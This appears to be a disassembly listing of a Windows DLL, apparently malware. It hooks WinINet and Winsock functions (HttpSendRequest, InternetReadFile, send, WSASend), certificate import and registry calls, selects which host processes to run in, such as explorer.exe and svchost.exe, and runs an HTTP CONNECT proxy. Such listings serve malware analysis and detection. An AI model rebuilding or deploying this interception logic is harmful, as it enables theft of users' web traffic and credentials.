push offset dword_10073A4C
call sub_1000FB92
add esp, 0Ch
push offset aPvoidReal_ht_0 ; "&(PVOID&)Real_HttpSendRequestW"
push offset sub_10012894
push offset dword_10073D9C
call sub_1000FB92
add esp, 0Ch
push offset aPvoidReal_ht_1 ; "&(PVOID&)Real_HttpSendRequestA"
push offset sub_10012DD0
push offset dword_10073DA0
call sub_1000FB92
add esp, 0Ch
push offset aPvoidReal_in_0 ; "&(PVOID&)Real_InternetQueryDataAvailabl"...
push offset sub_10010829
push offset dword_10073B70
call sub_1000FB92
add esp, 0Ch
push offset aPvoidReal_in_1 ; "&(PVOID&)Real_InternetReadFile"
push offset sub_10011167
push offset dword_10073DC0
call sub_1000FB92
add esp, 0Ch
push offset aPvoidReal_in_2 ; "&(PVOID&)Real_InternetReadFileEx"
push offset sub_100108A3
push offset dword_10073DCC
call sub_1000FB92
add esp, 0Ch
push offset aPvoidReal_in_3 ; "&(PVOID&)Real_InternetSetStatusCallback"...
push offset sub_1001036D
push offset dword_10073DD0
call sub_1000FB92
add esp, 0Ch
push offset aPvoidReal_rege ; "&(PVOID&)Real_RegEnumValueW"
push offset sub_1000FCEB
push offset dword_10073DAC
call sub_1000FB92
add esp, 0Ch
push offset aPvoidReal_send ; "&(PVOID&)Real_send"
push offset sub_10011CA2
push offset dword_10073B88
call sub_1000FB92
add esp, 0Ch
push offset aPvoidReal_wsas ; "&(PVOID&)Real_WSASend"
push offset sub_10011AA3
push offset dword_10073A58
call sub_1000FB92
add esp, 0Ch
call sub_10017857
pop ebp
retn
sub_1001338E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100134D4 proc near ; CODE XREF: sub_10013713+10�p
push ebp
mov ebp, esp
call sub_100176F1
call ds:GetCurrentThread ; GetCurrentThread
push eax ; hThread
call sub_10017AB5
push offset aPvoidReal_cr_0 ; "&(PVOID&)Real_CreateFileW"
push offset sub_100100FD ; lpAddress
push offset dword_10073A48 ; int
call sub_1000FBAA
add esp, 0Ch
push offset aPvoidReal_pf_0 ; "&(PVOID&)Real_PFXImportCertStore"
push offset sub_1000FFF9 ; lpAddress
push offset dword_10073DC8 ; int
call sub_1000FBAA
add esp, 0Ch
push offset aPvoidReal_in_4 ; "&(PVOID&)Real_InternetConnect"
push offset sub_10013315 ; lpAddress
push offset dword_10073DA8 ; int
call sub_1000FBAA
add esp, 0Ch
push offset aPvoidReal_ht_2 ; "&(PVOID&)Real_HttpOpenRequest"
push offset sub_10011E49 ; lpAddress
push offset dword_10073A4C ; int
call sub_1000FBAA
add esp, 0Ch
push offset aPvoidReal_ht_3 ; "&(PVOID&)Real_HttpSendRequestW"
push offset sub_10012894 ; lpAddress
push offset dword_10073D9C ; int
call sub_1000FBAA
add esp, 0Ch
push offset aPvoidReal_ht_4 ; "&(PVOID&)Real_HttpSendRequestA"
push offset sub_10012DD0 ; lpAddress
push offset dword_10073DA0 ; int
call sub_1000FBAA
add esp, 0Ch
push offset aPvoidReal_in_5 ; "&(PVOID&)Real_InternetQueryDataAvailabl"...
push offset sub_10010829 ; lpAddress
push offset dword_10073B70 ; int
call sub_1000FBAA
add esp, 0Ch
push offset aPvoidReal_in_6 ; "&(PVOID&)Real_InternetReadFile"
push offset sub_10011167 ; lpAddress
push offset dword_10073DC0 ; int
call sub_1000FBAA
add esp, 0Ch
push offset aPvoidReal_in_7 ; "&(PVOID&)Real_InternetReadFileEx"
push offset sub_100108A3 ; lpAddress
push offset dword_10073DCC ; int
call sub_1000FBAA
add esp, 0Ch
push offset aPvoidReal_in_8 ; "&(PVOID&)Real_InternetSetStatusCallback"...
push offset sub_1001036D ; lpAddress
push offset dword_10073DD0 ; int
call sub_1000FBAA
add esp, 0Ch
push offset aPvoidReal_re_0 ; "&(PVOID&)Real_RegEnumValueW"
push offset sub_1000FCEB ; lpAddress
push offset dword_10073DAC ; int
call sub_1000FBAA
add esp, 0Ch
push offset aPvoidReal_se_0 ; "&(PVOID&)Real_send"
push offset sub_10011CA2 ; lpAddress
push offset dword_10073B88 ; int
call sub_1000FBAA
add esp, 0Ch
push offset aPvoidReal_ws_0 ; "&(PVOID&)Real_WSASend"
push offset sub_10011AA3 ; lpAddress
push offset dword_10073A58 ; int
call sub_1000FBAA
add esp, 0Ch
call sub_10017857
pop ebp
retn
sub_100134D4 endp
; Exported entry 1. NullExport
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
public NullExport
NullExport proc near
push ebp
mov ebp, esp
pop ebp
retn
NullExport endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1001361F proc near ; CODE XREF: sub_100136A4+5E�p
; DllMain(x,x,x)+1ED�p ...
lpTlsValue = dword ptr -4
push ebp
mov ebp, esp
push ecx
cmp dwTlsIndex, 0
jl short loc_1001363A
push 0 ; lpTlsValue
mov eax, dwTlsIndex
push eax ; dwTlsIndex
call ds:TlsSetValue ; TlsSetValue
loc_1001363A: ; CODE XREF: sub_1001361F+B�j
cmp dword_10023420, 0
jl short loc_10013662
push offset Addend ; lpAddend
call ds:InterlockedIncrement ; InterlockedIncrement
mov [ebp+lpTlsValue], eax
mov ecx, [ebp+lpTlsValue]
push ecx ; lpTlsValue
mov edx, dword_10023420
push edx ; dwTlsIndex
call ds:TlsSetValue ; TlsSetValue
loc_10013662: ; CODE XREF: sub_1001361F+22�j
mov eax, 1
mov esp, ebp
pop ebp
retn
sub_1001361F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1001366B proc near ; CODE XREF: sub_10013713+8�p
; DllMain(x,x,x)+242�p
push ebp
mov ebp, esp
cmp dwTlsIndex, 0
jl short loc_10013685
push 0 ; lpTlsValue
mov eax, dwTlsIndex
push eax ; dwTlsIndex
call ds:TlsSetValue ; TlsSetValue
loc_10013685: ; CODE XREF: sub_1001366B+A�j
cmp dword_10023420, 0
jl short loc_1001369D
push 0 ; lpTlsValue
mov ecx, dword_10023420
push ecx ; dwTlsIndex
call ds:TlsSetValue ; TlsSetValue
loc_1001369D: ; CODE XREF: sub_1001366B+21�j
mov eax, 1
pop ebp
retn
sub_1001366B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100136A4 proc near ; CODE XREF: DllMain(x,x,x)+218�p
var_20C = dword ptr -20Ch
var_208 = byte ptr -208h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20Ch
call ds:TlsAlloc ; TlsAlloc
mov dwTlsIndex, eax
call ds:TlsAlloc ; TlsAlloc
mov dword_10023420, eax
mov eax, [ebp+arg_0]
mov dword_10073DD8, eax
push 104h
push offset dword_10073B94
mov ecx, [ebp+arg_0]
push ecx
call dword_10073B68
push 104h
lea edx, [ebp+var_208]
push edx
push 0
call dword_10073B68
call sub_1001338E
mov [ebp+var_20C], eax
mov eax, [ebp+arg_0]
push eax
call sub_1001361F
add esp, 4
mov eax, 1
mov esp, ebp
pop ebp
retn
sub_100136A4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10013713 proc near ; CODE XREF: DllMain(x,x,x)+226�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
push eax
call sub_1001366B
add esp, 4
call sub_100134D4
mov [ebp+var_4], eax
cmp dwTlsIndex, 0
jl short loc_10013741
mov ecx, dwTlsIndex
push ecx ; dwTlsIndex
call ds:TlsFree ; TlsFree
loc_10013741: ; CODE XREF: sub_10013713+1F�j
cmp dword_10023420, 0
jl short loc_10013757
mov edx, dword_10023420
push edx ; dwTlsIndex
call ds:TlsFree ; TlsFree
loc_10013757: ; CODE XREF: sub_10013713+35�j
mov eax, 1
mov esp, ebp
pop ebp
retn
sub_10013713 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; BOOL __stdcall DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
_DllMain@12 proc near ; CODE XREF: DllEntryPoint+4B�p
var_108 = dword ptr -108h
Str = byte ptr -104h
hinstDLL = dword ptr 8
fdwReason = dword ptr 0Ch
lpvReserved = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 108h
push 104h ; nSize
lea eax, [ebp+Str]
push eax ; lpFilename
push 0 ; hModule
call ds:GetModuleFileNameA ; GetModuleFileNameA
push offset aSystem32 ; "system32"
lea ecx, [ebp+Str]
push ecx ; Str
call ds:_strlwr ; _strlwr
add esp, 4
push eax ; Str
call ds:strstr ; strstr
add esp, 8
test eax, eax
jz short loc_100137EA
push offset aSvchost_exe ; "svchost.exe"
lea edx, [ebp+Str]
push edx ; Str
call ds:_strlwr ; _strlwr
add esp, 4
push eax ; Str
call ds:strstr ; strstr
add esp, 8
test eax, eax
jnz short loc_100137EA
push offset aRegedt32 ; "regedt32"
lea eax, [ebp+Str]
push eax ; Str
call ds:_strlwr ; _strlwr
add esp, 4
push eax ; Str
call ds:strstr ; strstr
add esp, 8
test eax, eax
jz loc_100138C4
loc_100137EA: ; CODE XREF: DllMain(x,x,x)+3E�j
; DllMain(x,x,x)+61�j
push offset aVisualStudio ; "visual studio"
lea ecx, [ebp+Str]
push ecx ; Str
call ds:_strlwr ; _strlwr
add esp, 4
push eax ; Str
call ds:strstr ; strstr
add esp, 8
test eax, eax
jnz loc_100138C4
push offset aQip ; "qip"
lea edx, [ebp+Str]
push edx ; Str
call ds:_strlwr ; _strlwr
add esp, 4
push eax ; Str
call ds:strstr ; strstr
add esp, 8
test eax, eax
jnz loc_100138C4
push offset aUsergate ; "usergate"
lea eax, [ebp+Str]
push eax ; Str
call ds:_strlwr ; _strlwr
add esp, 4
push eax ; Str
call ds:strstr ; strstr
add esp, 8
test eax, eax
jnz short loc_100138C4
push offset aNotepad ; "notepad"
lea ecx, [ebp+Str]
push ecx ; Str
call ds:_strlwr ; _strlwr
add esp, 4
push eax ; Str
call ds:strstr ; strstr
add esp, 8
test eax, eax
jnz short loc_100138C4
push offset aPsi_exe ; "psi.exe"
lea edx, [ebp+Str]
push edx ; Str
call ds:_strlwr ; _strlwr
add esp, 4
push eax ; Str
call ds:strstr ; strstr
add esp, 8
test eax, eax
jnz short loc_100138C4
push offset aFc_exe ; "fc.exe"
lea eax, [ebp+Str]
push eax ; Str
call ds:_strlwr ; _strlwr
add esp, 4
push eax ; Str
call ds:strstr ; strstr
add esp, 8
test eax, eax
jz short loc_100138CB
loc_100138C4: ; CODE XREF: DllMain(x,x,x)+84�j
; DllMain(x,x,x)+AB�j ...
xor eax, eax
jmp loc_100139B1
; ---------------------------------------------------------------------------
loc_100138CB: ; CODE XREF: DllMain(x,x,x)+162�j
mov ecx, [ebp+fdwReason]
mov [ebp+var_108], ecx
cmp [ebp+var_108], 3
ja loc_100139AC
mov edx, [ebp+var_108]
jmp ds:off_100139B7[edx*4]
loc_100138EE: ; DATA XREF: .text:100139BB�o
push offset aExplorer_exe ; "explorer.exe"
lea eax, [ebp+Str]
push eax ; Str
call ds:_strlwr ; _strlwr
add esp, 4
push eax ; Str
call ds:strstr ; strstr
add esp, 8
test eax, eax
jnz short loc_10013934
push offset aSvchost_exe_0 ; "svchost.exe"
lea ecx, [ebp+Str]
push ecx ; Str
call ds:_strlwr ; _strlwr
add esp, 4
push eax ; Str
call ds:strstr ; strstr
add esp, 8
test eax, eax
jz short loc_10013957
loc_10013934: ; CODE XREF: DllMain(x,x,x)+1AF�j
push 0 ; lpThreadId
push 0 ; dwCreationFlags
push 0 ; lpParameter
push offset sub_10016C4C ; lpStartAddress
push 0 ; dwStackSize
push 0 ; lpThreadAttributes
call ds:CreateThread ; CreateThread
mov edx, [ebp+hinstDLL]
push edx
call sub_1001361F
add esp, 4
jmp short loc_100139B1
; ---------------------------------------------------------------------------
loc_10013957: ; CODE XREF: DllMain(x,x,x)+1D2�j
call sub_1000C9DC
push 0 ; lpName
push 0 ; bInitialState
push 0 ; bManualReset
push 0 ; lpEventAttributes
call ds:CreateEventA ; CreateEventA
mov hEvent, eax
call sub_1001854D
mov eax, [ebp+hinstDLL]
push eax
call sub_100136A4
add esp, 4
jmp short loc_100139B1
; ---------------------------------------------------------------------------
loc_10013982: ; CODE XREF: DllMain(x,x,x)+187�j
; DATA XREF: .text:off_100139B7�o
mov ecx, [ebp+hinstDLL]
push ecx
call sub_10013713
add esp, 4
jmp short loc_100139B1
; ---------------------------------------------------------------------------
loc_10013990: ; CODE XREF: DllMain(x,x,x)+187�j
; DATA XREF: .text:100139BF�o
mov edx, [ebp+hinstDLL]
push edx
call sub_1001361F
add esp, 4
jmp short loc_100139B1
; ---------------------------------------------------------------------------
loc_1001399E: ; CODE XREF: DllMain(x,x,x)+187�j
; DATA XREF: .text:100139C3�o
mov eax, [ebp+hinstDLL]
push eax
call sub_1001366B
add esp, 4
jmp short loc_100139B1
; ---------------------------------------------------------------------------
loc_100139AC: ; CODE XREF: DllMain(x,x,x)+17B�j
mov eax, 1
loc_100139B1: ; CODE XREF: DllMain(x,x,x)+166�j
; DllMain(x,x,x)+1F5�j ...
mov esp, ebp
pop ebp
retn 0Ch
_DllMain@12 endp
; ---------------------------------------------------------------------------
off_100139B7 dd offset loc_10013982 ; DATA XREF: DllMain(x,x,x)+187�r
dd offset loc_100138EE
dd offset loc_10013990
dd offset loc_1001399E
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_100139D0(int, int, char *DstBuf)
sub_100139D0 proc near ; CODE XREF: sub_10016C4C+4CD�p
; sub_10016C4C+58D�p
Val = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
DstBuf = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push esi
loc_100139D5: ; CODE XREF: sub_100139D0+2B�j
; sub_100139D0+33�j
call ds:rand ; rand
mov esi, eax
call ds:rand ; rand
cdq
and edx, 3FFFh
add eax, edx
sar eax, 0Eh
imul esi, eax
mov [ebp+Val], esi
mov eax, [ebp+Val]
cmp eax, [ebp+arg_0]
jl short loc_100139D5
mov ecx, [ebp+Val]
cmp ecx, [ebp+arg_4]
jg short loc_100139D5
push 0Ah ; Radix
mov edx, [ebp+DstBuf]
push edx ; DstBuf
mov eax, [ebp+Val]
push eax ; Val
call ds:_itoa ; _itoa
add esp, 0Ch
mov eax, [ebp+Val]
pop esi
mov esp, ebp
pop ebp
retn
sub_100139D0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_10013A20(char *lpString2, char *SubStr, int)
sub_10013A20 proc near ; CODE XREF: sub_10013E02+25E�p
var_C6EC = dword ptr -0C6ECh
var_C6E8 = byte ptr -0C6E8h
lpMem = dword ptr -0C668h
Str = dword ptr -0C664h
var_C660 = dword ptr -0C660h
var_C65C = dword ptr -0C65Ch
var_C658 = dword ptr -0C658h
Dst = dword ptr -0C654h
Str1 = byte ptr -0C650h
Source = byte ptr -0C450h
var_10 = byte ptr -10h
var_F = dword ptr -0Fh
var_B = dword ptr -0Bh
var_7 = byte ptr -7
var_4 = dword ptr -4
lpString2 = dword ptr 8
SubStr = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, 0C6ECh
call __alloca_probe
mov [ebp+lpMem], 0
xor eax, eax
mov [ebp+Str], eax
mov [ebp+var_C660], eax
mov [ebp+var_C65C], eax
mov [ebp+var_10], 0
xor ecx, ecx
mov [ebp+var_F], ecx
mov [ebp+var_B], ecx
mov [ebp+var_7], cl
push 1000h ; dwBytes
push 8 ; dwFlags
call ds:GetProcessHeap ; GetProcessHeap
push eax ; hHeap
call ds:HeapAlloc
mov [ebp+Dst], eax
lea edx, [ebp+var_C6E8]
push edx
lea eax, [ebp+Source]
push eax
lea ecx, [ebp+Str1]
push ecx
push offset aSSS ; "%s%s%s"
mov edx, [ebp+lpString2]
push edx ; Src
call ds:sscanf ; sscanf
add esp, 14h
push offset aConnect ; "CONNECT"
lea eax, [ebp+Str1]
push eax ; Str1
call ds:_stricmp ; _stricmp
add esp, 8
test eax, eax
jnz short loc_10013B06
mov dword_10073E20, 1
push offset asc_10023D7C ; ":"
lea ecx, [ebp+lpMem]
push ecx ; int
lea edx, [ebp+Source]
push edx ; Source
call sub_100011DC
add esp, 0Ch
mov eax, [ebp+lpMem]
push eax ; Source
mov ecx, [ebp+SubStr]
push ecx ; Dest
call strcpy ; strcpy
add esp, 8
mov edx, [ebp+Str]
push edx ; Str
call ds:atoi ; atoi
add esp, 4
mov ecx, [ebp+arg_8]
mov [ecx], eax
jmp loc_10013DF9
; ---------------------------------------------------------------------------
loc_10013B06: ; CODE XREF: sub_10013A20+92�j
mov dword_10073E20, 2
push offset aHttp_0 ; "http://"
lea edx, [ebp+Source]
push edx ; Str
call ds:strstr ; strstr
add esp, 8
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz loc_10013DF9
push offset aHttp_1 ; "http://"
call strlen ; strlen
add esp, 4
mov ecx, [ebp+var_4]
add ecx, eax
mov [ebp+var_4], ecx
mov [ebp+var_C658], 0
jmp short loc_10013B62
; ---------------------------------------------------------------------------
loc_10013B53: ; CODE XREF: sub_10013A20:loc_10013B89�j
mov edx, [ebp+var_C658]
add edx, 1
mov [ebp+var_C658], edx
loc_10013B62: ; CODE XREF: sub_10013A20+131�j
mov eax, [ebp+var_4]
push eax ; Str
call strlen ; strlen
add esp, 4
cmp [ebp+var_C658], eax
jnb short loc_10013B8B
mov ecx, [ebp+var_4]
add ecx, [ebp+var_C658]
movsx edx, byte ptr [ecx]
cmp edx, 2Fh
jnz short loc_10013B89
jmp short loc_10013B8B
; ---------------------------------------------------------------------------
loc_10013B89: ; CODE XREF: sub_10013A20+165�j
jmp short loc_10013B53
; ---------------------------------------------------------------------------
loc_10013B8B: ; CODE XREF: sub_10013A20+154�j
; sub_10013A20+167�j
mov eax, [ebp+var_4]
add eax, [ebp+var_C658]
mov byte ptr [eax], 0
push offset asc_10023D90 ; ":"
lea ecx, [ebp+lpMem]
push ecx ; int
mov edx, [ebp+var_4]
push edx ; Source
call sub_100011DC
add esp, 0Ch
cmp [ebp+Str], 0
jz short loc_10013C06
mov eax, [ebp+lpMem]
push eax ; Source
mov ecx, [ebp+SubStr]
push ecx ; Dest
call strcpy ; strcpy
add esp, 8
mov edx, [ebp+Str]
push edx ; Str
call ds:atoi ; atoi
add esp, 4
mov ecx, [ebp+arg_8]
mov [ecx], eax
push offset asc_10023D94 ; ":"
lea edx, [ebp+var_10]
push edx ; Dest
call strcpy ; strcpy
add esp, 8
mov eax, [ebp+Str]
push eax ; Source
lea ecx, [ebp+var_10]
push ecx ; Dest
call strcat ; strcat
add esp, 8
jmp short loc_10013C1F
; ---------------------------------------------------------------------------
loc_10013C06: ; CODE XREF: sub_10013A20+196�j
mov edx, [ebp+var_4]
push edx ; Source
mov eax, [ebp+SubStr]
push eax ; Dest
call strcpy ; strcpy
add esp, 8
mov ecx, [ebp+arg_8]
mov dword ptr [ecx], 50h
loc_10013C1F: ; CODE XREF: sub_10013A20+1E4�j
mov [ebp+var_C6EC], 0
jmp short loc_10013C3A
; ---------------------------------------------------------------------------
loc_10013C2B: ; CODE XREF: sub_10013A20:loc_10013C81�j
mov edx, [ebp+var_C6EC]
add edx, 1
mov [ebp+var_C6EC], edx
loc_10013C3A: ; CODE XREF: sub_10013A20+209�j
cmp [ebp+var_C6EC], 4
jge short loc_10013C83
mov eax, [ebp+var_C6EC]
cmp [ebp+eax*4+lpMem], 0
jz short loc_10013C81
mov ecx, [ebp+var_C6EC]
mov edx, [ebp+ecx*4+lpMem]
push edx ; lpMem
push 0 ; dwFlags
call ds:GetProcessHeap ; GetProcessHeap
push eax ; hHeap
call ds:HeapFree
mov eax, [ebp+var_C6EC]
mov [ebp+eax*4+lpMem], 0
loc_10013C81: ; CODE XREF: sub_10013A20+231�j
jmp short loc_10013C2B
; ---------------------------------------------------------------------------
loc_10013C83: ; CODE XREF: sub_10013A20+221�j
push 1 ; int
mov ecx, [ebp+Dst]
push ecx ; Dest
push offset dword_10073F8C ; int
mov edx, [ebp+SubStr]
push edx ; SubStr
mov eax, [ebp+lpString2]
push eax ; lpString2
call sub_100012D1
add esp, 14h
mov ecx, [ebp+Dst]
push ecx ; Source
mov edx, [ebp+lpString2]
push edx ; Dest
call strcpy ; strcpy
add esp, 8
lea eax, [ebp+var_10]
push eax ; Str
call strlen ; strlen
add esp, 4
test eax, eax
jbe short loc_10013D0B
push 1000h ; Size
push 0 ; Val
mov ecx, [ebp+Dst]
push ecx ; Dst
call memset ; memset
add esp, 0Ch
push 1 ; int
mov edx, [ebp+Dst]
push edx ; Dest
push offset dword_10073F90 ; int
lea eax, [ebp+var_10]
push eax ; SubStr
mov ecx, [ebp+lpString2]
push ecx ; lpString2
call sub_100012D1
add esp, 14h
mov edx, [ebp+Dst]
push edx ; Source
mov eax, [ebp+lpString2]
push eax ; Dest
call strcpy ; strcpy
add esp, 8
loc_10013D0B: ; CODE XREF: sub_10013A20+2A2�j
push 1000h ; Size
push 0 ; Val
mov ecx, [ebp+Dst]
push ecx ; Dst
call memset ; memset
add esp, 0Ch
push 1 ; int
mov edx, [ebp+Dst]
push edx ; Dest
push offset dword_10073F94 ; int
push offset aHttp_2 ; "http://"
mov eax, [ebp+lpString2]
push eax ; lpString2
call sub_100012D1
add esp, 14h
mov ecx, [ebp+Dst]
push ecx ; Source
mov edx, [ebp+lpString2]
push edx ; Dest
call strcpy ; strcpy
add esp, 8
push 1000h ; Size
push 0 ; Val
mov eax, [ebp+Dst]
push eax ; Dst
call memset ; memset
add esp, 0Ch
push 1 ; int
mov ecx, [ebp+Dst]
push ecx ; Dest
push offset dword_10073F98 ; int
push offset aProxyConnectio ; "Proxy-Connection: Keep-Alive\r\n"
mov edx, [ebp+lpString2]
push edx ; lpString2
call sub_100012D1
add esp, 14h
mov eax, [ebp+Dst]
push eax ; Source
mov ecx, [ebp+lpString2]
push ecx ; Dest
call strcpy ; strcpy
add esp, 8
push 1000h ; Size
push 0 ; Val
mov edx, [ebp+Dst]
push edx ; Dst
call memset ; memset
add esp, 0Ch
push 1 ; int
mov eax, [ebp+Dst]
push eax ; Dest
push offset aHttp1_1 ; "HTTP/1.1"
push offset aHttp1_0 ; "HTTP/1.0"
mov ecx, [ebp+lpString2]
push ecx ; lpString2
call sub_100012D1
add esp, 14h
mov edx, [ebp+Dst]
push edx ; Source
mov eax, [ebp+lpString2]
push eax ; Dest
call strcpy ; strcpy
add esp, 8
mov ecx, [ebp+Dst]
push ecx ; lpMem
push 0 ; dwFlags
call ds:GetProcessHeap ; GetProcessHeap
push eax ; hHeap
call ds:HeapFree
loc_10013DF9: ; CODE XREF: sub_10013A20+E1�j
; sub_10013A20+10C�j
mov eax, 1
mov esp, ebp
pop ebp
retn
sub_10013A20 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall sub_10013E02(LPVOID)
sub_10013E02 proc near ; DATA XREF: sub_10013E02+8D�o
; sub_10016BBE+76�o
var_C6AC = dword ptr -0C6ACh
var_C6A8 = dword ptr -0C6A8h
var_C6A4 = dword ptr -0C6A4h
var_C6A0 = dword ptr -0C6A0h
s = dword ptr -0C69Ch
var_C698 = dword ptr -0C698h
var_C694 = dword ptr -0C694h
var_C690 = dword ptr -0C690h
var_C68C = dword ptr -0C68Ch
var_C688 = dword ptr -0C688h
var_C684 = dword ptr -0C684h
len = dword ptr -0C680h
hHandle = dword ptr -0C67Ch
readfds = fd_set ptr -0C678h
var_C574 = byte ptr -0C574h
Parameter = byte ptr -0C564h
hObject = dword ptr -0C464h
var_C460 = dword ptr -0C460h
var_C45C = dword ptr -0C45Ch
timeout = timeval ptr -0C458h
String2 = byte ptr -0C450h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
lpParameter = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_10013E02
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
mov eax, 0C69Ch
call __alloca_probe
push ebx
push esi
push edi
mov [ebp+var_10], esp
mov [ebp+var_C688], 10h
mov [ebp+readfds.fd_count], 0
mov [ebp+timeout.tv_sec], 0
mov [ebp+timeout.tv_usec], 989680h
mov [ebp+var_4], 0
lea eax, [ebp+var_C688]
push eax
lea ecx, [ebp+var_C574]
push ecx
mov edx, dword_10073F34
push edx
call dword_10073F80 ; accept
mov [ebp+var_C6AC], eax
mov eax, [ebp+var_C6AC]
mov [ebp+var_C68C], eax
push 0 ; lpThreadId
push 0 ; dwCreationFlags
mov ecx, [ebp+lpParameter]
push ecx ; lpParameter
push offset sub_10013E02 ; lpStartAddress
push 0 ; dwStackSize
push 0 ; lpThreadAttributes
call ds:CreateThread ; CreateThread
cmp [ebp+var_C68C], 0FFFFFFFFh
jnz short loc_10013EB1
mov eax, 0FFFFFFFBh
jmp loc_100142EC
; ---------------------------------------------------------------------------
loc_10013EB1: ; CODE XREF: sub_10013E02+A3�j
mov [ebp+var_C694], 0
mov [ebp+var_C690], 1
mov edx, [ebp+var_C68C]
mov [ebp+s], edx
loc_10013ED1: ; CODE XREF: sub_10013E02+14E�j
mov [ebp+var_C6A0], 0
jmp short loc_10013EEC
; ---------------------------------------------------------------------------
loc_10013EDD: ; CODE XREF: sub_10013E02:loc_10013F11�j
mov eax, [ebp+var_C6A0]
add eax, 1
mov [ebp+var_C6A0], eax
loc_10013EEC: ; CODE XREF: sub_10013E02+D9�j
mov ecx, [ebp+var_C6A0]
cmp ecx, [ebp+readfds.fd_count]
jnb short loc_10013F13
mov edx, [ebp+var_C6A0]
mov eax, [ebp+edx*4+readfds.fd_array]
cmp eax, [ebp+s]
jnz short loc_10013F11
jmp short loc_10013F13
; ---------------------------------------------------------------------------
loc_10013F11: ; CODE XREF: sub_10013E02+10B�j
jmp short loc_10013EDD
; ---------------------------------------------------------------------------
loc_10013F13: ; CODE XREF: sub_10013E02+F6�j
; sub_10013E02+10D�j
mov ecx, [ebp+var_C6A0]
cmp ecx, [ebp+readfds.fd_count]
jnz short loc_10013F4C
cmp [ebp+readfds.fd_count], 40h
jnb short loc_10013F4C
mov edx, [ebp+var_C6A0]
mov eax, [ebp+s]
mov [ebp+edx*4+readfds.fd_array], eax
mov ecx, [ebp+readfds.fd_count]
add ecx, 1
mov [ebp+readfds.fd_count], ecx
loc_10013F4C: ; CODE XREF: sub_10013E02+11D�j
; sub_10013E02+126�j
xor edx, edx
test edx, edx
jnz loc_10013ED1
lea eax, [ebp+timeout]
push eax ; timeout
push 0 ; exceptfds
push 0 ; writefds
lea ecx, [ebp+readfds]
push ecx ; readfds
push 0 ; nfds
call ds:select ; select
push 0 ; flags
push 0C440h ; len
lea edx, [ebp+String2]
push edx ; buf
mov eax, [ebp+s]
push eax ; s
call ds:recv ; recv
mov [ebp+var_C684], eax
cmp [ebp+var_C684], 0FFFFFFFFh
jnz short loc_10013FC8
push offset aErrorRecv ; "\nError Recv"
call ds:printf ; printf
add esp, 4
cmp [ebp+var_C694], 0
jnz short loc_10013FC8
mov ecx, [ebp+s]
push ecx ; s
call ds:closesocket ; closesocket
mov [ebp+var_C694], 1
loc_10013FC8: ; CODE XREF: sub_10013E02+196�j
; sub_10013E02+1AD�j
cmp [ebp+var_C684], 0
jnz short loc_10013FFF
push offset aClientCloseCon ; "Client Close connection\n"
call ds:printf ; printf
add esp, 4
cmp [ebp+var_C694], 0
jnz short loc_10013FFF
mov edx, [ebp+s]
push edx ; s
call ds:closesocket ; closesocket
mov [ebp+var_C694], 1
loc_10013FFF: ; CODE XREF: sub_10013E02+1CD�j
; sub_10013E02+1E4�j
mov eax, [ebp+var_C684]
mov [ebp+len], eax
mov [ebp+var_C694], 0
mov [ebp+var_C690], 1
mov ecx, [ebp+var_C68C]
mov [ebp+s], ecx
lea edx, [ebp+s]
mov [ebp+var_C460], edx
push 0 ; lpName
push 0 ; bInitialState
push 1 ; bManualReset
push 0 ; lpEventAttributes
call ds:CreateEventA ; CreateEventA
mov [ebp+hObject], eax
lea eax, [ebp+var_C45C]
push eax ; int
lea ecx, [ebp+Parameter]
push ecx ; SubStr
lea edx, [ebp+String2]
push edx ; lpString2
call sub_10013A20
add esp, 0Ch
push 0 ; lpThreadId
push 0 ; dwCreationFlags
lea eax, [ebp+Parameter]
push eax ; lpParameter
push offset sub_100142FF ; lpStartAddress
push 0 ; dwStackSize
push 0 ; lpThreadAttributes
call ds:CreateThread ; CreateThread
mov [ebp+hHandle], eax
push 0EA60h ; dwMilliseconds
mov ecx, [ebp+hObject]
push ecx ; hHandle
call ds:WaitForSingleObject ; WaitForSingleObject
mov edx, [ebp+hObject]
push edx ; hObject
call ds:CloseHandle ; CloseHandle
cmp dword_10073E20, 1
jnz short loc_100140C6
push 0 ; flags
push 28h ; len
push offset buf ; "HTTP/1.1 200 Connection established\r\n\r\n"...
mov eax, [ebp+s]
push eax ; s
call ds:send ; send
loc_100140C6: ; CODE XREF: sub_10013E02+2AC�j
; sub_10013E02:loc_10014145�j ...
cmp [ebp+var_C690], 0
jnz loc_10014274
cmp [ebp+var_C694], 0
jnz loc_10014274
push offset aConnect_0 ; "CONNECT"
lea ecx, [ebp+String2]
push ecx ; Str
call ds:strstr ; strstr
add esp, 8
test eax, eax
jnz short loc_1001414A
push 0 ; flags
mov edx, [ebp+len]
push edx ; len
lea eax, [ebp+String2]
push eax ; buf
mov ecx, [ebp+var_C698]
push ecx ; s
call ds:send ; send
mov [ebp+var_C684], eax
cmp [ebp+var_C684], 0FFFFFFFFh
jnz short loc_1001414A
cmp [ebp+var_C690], 0
jnz short loc_10014145
mov edx, [ebp+var_C698]
push edx ; s
call ds:closesocket ; closesocket
mov [ebp+var_C690], 1
